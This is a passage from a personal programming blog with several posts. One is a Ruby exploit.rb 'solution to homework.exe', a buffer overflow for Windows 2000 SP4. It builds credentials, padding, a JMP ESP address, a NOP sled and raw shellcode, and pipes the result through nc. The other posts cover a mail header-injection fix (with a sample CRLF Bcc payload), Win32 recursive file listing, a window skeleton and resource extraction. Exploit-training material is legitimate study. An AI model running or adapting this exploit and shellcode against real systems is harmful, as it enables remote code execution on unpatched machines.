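  # Constructed responses standing in for what the fetch might return.
  ["203.0.113.7\n", "<html>503 Service Unavailable</html>", "1.2.3.4\r\nBcc: x@example.com"].each do |body|
    puts "#{body.inspect} -> #{decide('203.0.113.9', body)}"
  end
end
```

Dropping this into checkip.rb means replacing `new_ip = new_ip.html.chomp` with `extract_ip(...)` and bailing out on nil before `email_admin` and the `File.open(".checkip", "w")` write. The header-injection case is the one to remember: a mail message is just text, so any untrusted value that can contain "\r\n" can add headers.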

 

Posted by hammackj


23 Jan 2009

Solution to homework.exe

This is the solution to the homework.exe that was posted at http://pentest.cryptocity.net/exploitation/. The videos are great, a must-watch for anyone that wants to try exploit development. Just a simple Ruby script; it only works against Windows 2000 SP4 R1, the only VM I had access to.
exploit.rb
#!/usr/bin/env ruby
#usage ./exploit.rb | nc ip homework.exe 1974
require 'socket'

#2000 SP4 Rollup 1
JMP_ESP = [0x77F81BE3].pack('V')
NOP = "\x90"
USERNAME = "poly"
PASSWORD = "teknik"

PAYLOAD = "\x33\xc9\xb1\x56\xbb\x79\xaa\x11\x96\xd9\xf6\xd9\x74\x24" +
          "\xf4\x5f\x31\x5f\x10\x03\x5f\x10\x83\xc7\x04\x9b\x5f\xed" +
          "\x7e\xd2\xa0\x0e\x7f\x84\x29\xeb\x4e\x96\x4e\x7f\xe2\x26" +
          "\x04\x2d\x0f\xcd\x48\xc6\x84\xa3\x44\xe9\x2d\x09\xb3\xc4" +
          "\xae\xbc\x7b\x8a\x6d\xdf\x07\xd1\xa1\x3f\x39\x1a\xb4\x3e" +
          "\x7e\x47\x37\x12\xd7\x03\xea\x82\x5c\x51\x37\xa3\xb2\xdd" +
          "\x07\xdb\xb7\x22\xf3\x51\xb9\x72\xac\xee\xf1\x6a\xc6\xa8" +
          "\x21\x8a\x0b\xab\x1e\xc5\x20\x1f\xd4\xd4\xe0\x6e\x15\xe7" +
          "\xcc\x3c\x28\xc7\xc0\x3d\x6c\xe0\x3a\x48\x86\x12\xc6\x4a" +
          "\x5d\x68\x1c\xdf\x40\xca\xd7\x47\xa1\xea\x34\x11\x22\xe0" +
          "\xf1\x56\x6c\xe5\x04\xbb\x06\x11\x8c\x3a\xc9\x93\xd6\x18" +
          "\xcd\xf8\x8d\x01\x54\xa5\x60\x3e\x86\x01\xdc\x9a\xcc\xa0" +
          "\x09\x9c\x8e\xac\xfe\x92\x30\x2d\x69\xa5\x43\x1f\x36\x1d" +
          "\xcc\x13\xbf\xbb\x0b\x53\xea\x7b\x83\xaa\x15\x7b\x8d\x68" +
          "\x41\x2b\xa5\x59\xea\xa0\x35\x65\x3f\x66\x66\xc9\x90\xc6" +
          "\xd6\xa9\x40\xae\x3c\x26\xbe\xce\x3e\xec\xc9\xc9\xf0\xd4" +
          "\x99\xbd\xf0\xea\x0c\x61\x7c\x0c\x44\x89\x28\x86\xf1\x6b" +
          "\x0f\x1f\x65\x94\x65\x33\x3e\x02\x31\x5d\xf8\x2d\xc2\x4b" +
          "\xaa\x82\x6a\x1c\x39\xc8\xae\x3d\x3e\xc5\x86\x34\x06\x8d" +
          "\x5d\x29\xc4\x2c\x61\x60\xbe\xcd\xf0\xef\x3f\x98\xe8\xa7" +
          "\x68\xcd\xdf\xb1\xfd\xe3\x46\x68\xe0\xfe\x1f\x53\xa0\x24" +
          "\xdc\x5a\x28\xa9\x58\x79\x3a\x77\x60\xc5\x6e\x27\x37\x93" +
          "\xd8\x81\xe1\x55\xb3\x5b\x5d\x3c\x53\x1a\xad\xff\x25\x23" +
          "\xf8\x89\xca\x95\x55\xcc\xf5\x19\x32\xd8\x8e\x44\xa2\x27" +
          "\x45\xcd\xc2\xc5\x4c\x3b\x6b\x50\x05\x86\xf6\x63\xf3\xc4" +
          "\x0e\xe0\xf6\xb4\xf4\xf8\x72\xb1\xb1\xbe\x6f\xcb\xaa\x2a" +
          "\x90\x78\xca\x7e\x9a"

boom = USERNAME + ":" + PASSWORD + "A" * 117 + JMP_ESP + NOP * 500 + PAYLOAD + "\r\n"
puts boom + "\r\n"

 

Posted by hammackj


14 Jan 2009

List Windows File System Recursively

In a few of the tools that I have written, I have needed to list the Windows file system recursively. While .NET makes this much easier, all of the tools I write are in Win32 C. Hopefully this will help someone else, as when I looked for information on this I did not find very much.

#include <windows.h>
#include <tchar.h>

static void RecurseFileSystem(TCHAR *StartingPath)
{
    HANDLE CurrentFileHandle;
    WIN32_FIND_DATA FileInformation;
    TCHAR CurrentFileName[MAX_PATH];
    TCHAR m_szFolderInitialPath[MAX_PATH];
    TCHAR wildCard[MAX_PATH] = TEXT("\\*.*");

    /* _TRUNCATE makes the *_s functions cut the result at MAX_PATH-1 instead
       of calling the invalid-parameter handler when a path is too long */
    _tcscpy_s(CurrentFileName, MAX_PATH, StartingPath);
    _tcscpy_s(m_szFolderInitialPath, MAX_PATH, StartingPath);
    _tcsncat_s(m_szFolderInitialPath, MAX_PATH, wildCard, _TRUNCATE);

    CurrentFileHandle = FindFirstFile(m_szFolderInitialPath, &FileInformation);

    if(CurrentFileHandle != INVALID_HANDLE_VALUE)
    {
        do
        {
            /* Skip the "." and ".." entries or the recursion never ends */
            if((_tcscmp(FileInformation.cFileName, TEXT(".")) != 0) && (_tcscmp(FileInformation.cFileName, TEXT("..")) != 0))
            {
                _tcscpy_s(CurrentFileName, MAX_PATH, StartingPath);
                _tcsncat_s(CurrentFileName, MAX_PATH, TEXT("\\"), _TRUNCATE);
                _tcsncat_s(CurrentFileName, MAX_PATH, FileInformation.cFileName, _TRUNCATE);

                if(FileInformation.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
                {
                    /* Junctions and symlinks are reparse points; descending into
                       them can loop forever (a junction pointing at a parent) */
                    if(!(FileInformation.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT))
                    {
                        RecurseFileSystem(CurrentFileName);
                    }
                }
                else
                {
                    /* Do action on file here! */
                }
            }
        }
        while(FindNextFile(CurrentFileHandle, &FileInformation));

        FindClose(CurrentFileHandle);
    }
}

 

Posted by hammackj


7 Jan 2009

Simple Win32 Window

I seem to always need this skeleton code to build a window but I can never seem to memorize the whole thing. I figured I would post it here to make it easier for me to find. The #pragma comment lines are not cross-platform and only work on Microsoft compilers, so watch out.

/**
 * SimpleWindow v1.0
 * @file
 *
 * 09-24-2008:  JPH - Created.
 *
 * @author Jacob Hammack
 */
 
#include <windows.h>
 
/**
 * Forces the compiler to link these libraries
 *
 */
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "kernel32.lib")
 
/**
 * WindowsMessageLoop is the window procedure: it processes the messages sent to the window
 *
 * @author Jacob Hammack
 */
LRESULT CALLBACK WindowsMessageLoop(HWND WindowHandle, UINT Message, WPARAM WindowParameters, LPARAM MoreWindowsParameters)
{
  switch(Message)
  {
    case WM_CREATE:
      return 0;
 
    case WM_PAINT:
      return 0;
 
    case WM_SIZE:
      return 0;
 
    case WM_DESTROY:
      PostQuitMessage(0);
      return 0;
  }
 
  return DefWindowProc(WindowHandle, Message, WindowParameters, MoreWindowsParameters);
}
 
/**
 * WinMain is the main() equivalent for a windows program, execution starts here.
 *
 * @author Jacob Hammack
 */
int WINAPI WinMain (HINSTANCE CurrentInstance, HINSTANCE PreviousInstance,  PSTR CommandLine, int CommandShow)
{
  static TCHAR ApplicationName[] = TEXT("SimpleWindow");
  HWND WindowHandle;
  MSG Message;
  WNDCLASS WindowsClass;
 
  WindowsClass.style = CS_HREDRAW | CS_VREDRAW;
  WindowsClass.lpfnWndProc = WindowsMessageLoop;
  WindowsClass.cbClsExtra = 0;
  WindowsClass.cbWndExtra = 0;
  WindowsClass.hInstance = CurrentInstance;
  WindowsClass.hIcon = LoadIcon(NULL, IDI_APPLICATION);
  WindowsClass.hCursor = LoadCursor(NULL, IDC_ARROW);
  WindowsClass.hbrBackground = (HBRUSH) GetStockObject(WHITE_BRUSH);
  WindowsClass.lpszMenuName = NULL;
  WindowsClass.lpszClassName = ApplicationName;
 
  if(!RegisterClass(&WindowsClass))
  {
    MessageBox(NULL, TEXT("Unable to create a window."), ApplicationName, MB_ICONERROR);
 
    return 0;
  }
 
  WindowHandle = CreateWindow(ApplicationName,        /* Window Class Name */
                              TEXT("Simple Window"),  /* Window Caption */
                              WS_OVERLAPPEDWINDOW,    /* Window Style */
                              CW_USEDEFAULT,          /* Initial X position */
                              CW_USEDEFAULT,          /* Initial Y position */
                              300,                    /* Initial Width of the window */
                              100,                    /* Initial Height of the window */
                              NULL,                   /* Parent Window Handle */
                              NULL,                   /* Window Menu Handle */
                              CurrentInstance,        /* Instance of the Program Handle */
                              NULL);                  /* Window Creation Parameters */
 
  ShowWindow(WindowHandle, CommandShow);
  UpdateWindow(WindowHandle);
 
  while(GetMessage(&Message, NULL, 0, 0))
  {
    TranslateMessage(&Message);
    DispatchMessage(&Message);
  }
 
  return (int) Message.wParam;  /* exit code passed to PostQuitMessage */
}
Makefile
CC=cl
CFLAGS= /nologo /MT /O2 /TC
LINKS=/link /OUT:simplewindow.exe /SUBSYSTEM:WINDOWS

all: simplewindow

simplewindow: simplewindow.c
	$(CC) $(CFLAGS) simplewindow.c $(LINKS)

clean:
	del *.exe; del *.obj

[screenshot: a_window_00]

 

Posted by hammackj


30 Jan 2009

Extracting binary resources in win32

Here is a useful snippet for extracting a binary resource from the compiled resources in an exe or dll. I haven't really seen anything that demonstrates how to do this exactly, so hopefully this helps someone. Maybe next time I will post the code to extract into memory and execute a PE file.

/**
 * Extracts a binary resource and write it to the specified output file.
 *
 * @param output_filename filename of the output file
 * @param resource_id resource id of object to extract from the resource file
 *
 * @author Jacob Hammack
 *
 */
void extract_resource(TCHAR *output_filename, int resource_id)
{
  HGLOBAL resource_handle = NULL;
  HANDLE file_handle;
  HRSRC resource;
  BYTE *resource_data;          /* byte pointer: the resource is raw data, not text */
  DWORD resource_size;
  DWORD total_written = 0;
  DWORD bytes_written = 0;

  /* NULL module handle means the executable that created the current process */
  if(!(resource = FindResource(NULL, MAKEINTRESOURCE(resource_id), RT_RCDATA)))
  {
    return;
  }

  if(!(resource_handle = LoadResource(NULL, resource)))
  {
    return;
  }

  /* LockResource returns a pointer into the mapped image; nothing to unlock or free */
  resource_data = (BYTE*) LockResource(resource_handle);
  resource_size = SizeofResource(NULL, resource);

  if(resource_data == NULL || resource_size == 0)
  {
    return;
  }

  file_handle = CreateFile(output_filename, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

  if(file_handle == INVALID_HANDLE_VALUE)
  {
    _tprintf(TEXT("[!] Unable to create file handle for writing temp data to disk.\n"));

    return;
  }

  /* WriteFile may write fewer bytes than requested, so keep a running total;
     the per-call count must not double as the cumulative offset */
  while(total_written < resource_size)
  {
    if(!WriteFile(file_handle, resource_data + total_written, resource_size - total_written, &bytes_written, NULL) || bytes_written == 0)
    {
      CloseHandle(file_handle);

      return;
    }

    total_written += bytes_written;
  }

  CloseHandle(file_handle);
}
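The write loop is the part of this snippet that deserves a second look. WriteFile, like write(2), is allowed to write fewer bytes than asked, so the count it returns has to be added to a running total; if the same variable is used as both the per-call count and the offset, a short write restarts the accounting and the file ends up with bytes missing or duplicated. The example below is added here and is not from the post: the loop is written against a writer callback so it can be exercised with a fake writer that accepts only a few bytes per call and with one that never makes progress. On Windows the callback would wrap WriteFile; the 100-byte "resource" and the sink are constructed for the demo.

```c
/* Added example (not from the original post): short-write bookkeeping for a
 * resource-extraction loop, testable without a Windows handle. */
#include <stddef.h>
#include <string.h>

/* Writer contract: copy up to len bytes, store how many in *written, return 1
 * on success and 0 on failure. A real implementation wraps WriteFile. */
typedef int (*write_fn)(void *ctx, const unsigned char *buf, size_t len, size_t *written);

/* Write all of data[0..size) through w. Returns 1 when every byte has been
 * accepted, 0 on writer failure or when the writer stops making progress. */
int write_all(write_fn w, void *ctx, const unsigned char *data, size_t size)
{
    size_t total = 0;
    while (total < size) {
        size_t n = 0;
        if (!w(ctx, data + total, size - total, &n))
            return 0;
        if (n == 0)            /* no progress: do not spin forever */
            return 0;
        total += n;            /* running total, not the last call's count */
    }
    return 1;
}

/* Fake writer for the demo: accepts at most `chunk` bytes per call. */
struct sink { unsigned char buf[256]; size_t len; size_t chunk; };

static int sink_write(void *ctx, const unsigned char *buf, size_t len, size_t *written)
{
    struct sink *s = ctx;
    size_t n = len < s->chunk ? len : s->chunk;
    if (s->len + n > sizeof s->buf)
        return 0;
    memcpy(s->buf + s->len, buf, n);
    s->len += n;
    *written = n;
    return 1;
}

/* Constructed 100-byte resource written through a writer that takes 7 bytes
 * at a time. Returns 1 when every byte arrived exactly once and in order. */
int demo_short_writes(void)
{
    unsigned char res[100];
    struct sink s = { {0}, 0, 7 };
    size_t i;
    for (i = 0; i < sizeof res; i++)
        res[i] = (unsigned char)i;
    if (!write_all(sink_write, &s, res, sizeof res))
        return 0;
    return s.len == sizeof res && memcmp(s.buf, res, sizeof res) == 0;
}

/* A writer that reports success but never accepts a byte: write_all must
 * return 0 instead of looping. Returns write_all's result. */
int demo_stalled_writer(void)
{
    unsigned char res[16] = {0};
    struct sink s = { {0}, 0, 0 };
    return write_all(sink_write, &s, res, sizeof res);
}
```

Swapping the page's loop for `write_all` with a WriteFile-backed callback keeps the extraction correct when the target is a pipe, a network share, or any handle that honours partial writes.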

 

Posted by hammackj